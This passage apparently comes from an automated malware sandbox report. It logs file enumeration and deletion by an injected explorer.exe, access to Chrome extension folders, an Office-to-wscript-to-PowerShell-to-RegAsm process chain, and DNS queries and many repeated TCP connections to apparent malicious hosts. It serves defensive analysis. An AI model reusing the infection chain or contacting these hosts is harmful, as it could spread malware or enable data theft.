            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_0008255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,21_2_0008255C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000815BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,22_2_000815BE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000814D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,22_2_000814D8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000813FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,22_2_000813FE
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior

            Software Vulnerabilities

            barindex
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: global trafficDNS query: name: crash.sh
            Source: global trafficDNS query: name: crash.sh
            Source: global trafficDNS query: name: crash.sh
            Source: global trafficDNS query: name: crash.sh
            Source: global trafficDNS query: name: crash.sh
            Source: global trafficDNS query: name: crash.sh
            Source: global trafficDNS query: name: crash.sh
            Source: global trafficDNS query: name: crash.sh
            Source: global trafficDNS query: name: ia803104.us.archive.org
            Source: global trafficDNS query: name: prolinice.ga
            Source: global trafficDNS query: name: prolinice.ga
            Source: global trafficDNS query: name: prolinice.ga
            Source: global trafficDNS query: name: prolinice.ga
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
